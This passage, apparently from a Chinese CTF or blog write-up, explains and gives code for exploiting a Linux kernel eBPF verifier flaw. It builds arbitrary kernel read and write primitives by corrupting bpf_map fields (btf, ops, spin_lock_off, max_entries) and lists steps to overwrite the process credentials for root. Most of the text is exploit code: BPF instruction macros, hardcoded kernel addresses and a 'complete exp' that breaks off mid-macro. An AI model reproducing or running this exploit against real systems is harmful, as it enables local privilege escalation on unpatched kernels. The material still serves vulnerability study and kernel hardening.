但函数 bpf_map_get_info_by_fd 被调用时,程序会把 bpf_map->btf.id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

构造任意写 WAA:

核心思想就是覆盖 bpf_map->opsbpf_array.value(可控地址),并在 bpf_array.value 上伪造一个 fake ops 将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • key 小于 map.max_entries 时,key 会被写入到 next_key 当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUEBPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int map_update_elem(union bpf_attr *attr)
{

......

if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* 读取bpf_map->ops,以保证程序的正常功能 */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* 覆写bpf_map->ops->map_push_elem */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_taskcurrent_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

static __always_inline void err_print(const char *msg)
{
printf("\033[31m\033[1m[x] Run eBPF error: \033[0m%s\n", msg);
}

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (uint64_t) insns,
.insn_cnt = insn_cnt,
.license = (uint64_t) "GPL",
.log_level = log_level,
.log_buf = (uint64_t) log_buf,
.log_size = log_buf_sz,
};

return bpf(BPF_PROG_LOAD, &attr);
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};

return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
};

return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.value = (uint64_t) value,
.flags = flags,
};

return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
};

return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t) key,
.next_key = (uint64_t) value,
};

return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
* @brief Run a bpf prog by attaching to a pair of sockets and sending packets
*
* @param insns bpf program to be run
* @param insn_cnt number of bpf instructions
* @return int 0 for success, others for failure
*/
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
unsigned int print_log)
{
char *err_msg = NULL;
int sock_fd[2], prog_fd;
int ret;

/* socket pair to trigger eBPF prog */
ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
if (ret < 0) {
err_msg = "FAILED to creat socket pair!";
goto err_socket;
}

memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

/* load bpf prog into kernel */
prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
if (prog_fd < 0) {
ret = prog_fd;
err_msg = "FAILED to load bpf program!";
goto err_bpf_load;
}

/* attach bpf prog to a socket */
ret = setsockopt(sock_fd[0],SOL_SOCKET,SO_ATTACH_BPF, &prog_fd,sizeof(int));
if (ret < 0) {
err_msg = "FAILED to attach the bpf program!";
goto err_bpf_attach;
}

/* send a packet to trigger bpf */
write(sock_fd[1], "11111111", 8);

/* output the log */
if (print_log != 0) {
puts(bpf_log_buf);
}

/* recycle resource */
close(prog_fd);
close(sock_fd[1]);
close(sock_fd[0]);

return 0;

err_bpf_attach:
close(prog_fd);
err_bpf_load:
puts(bpf_log_buf);
close(sock_fd[1]);
close(sock_fd[0]);
err_socket:
err_print(err_msg);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

#define MAKE_VULN_REG(__map_fd) \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
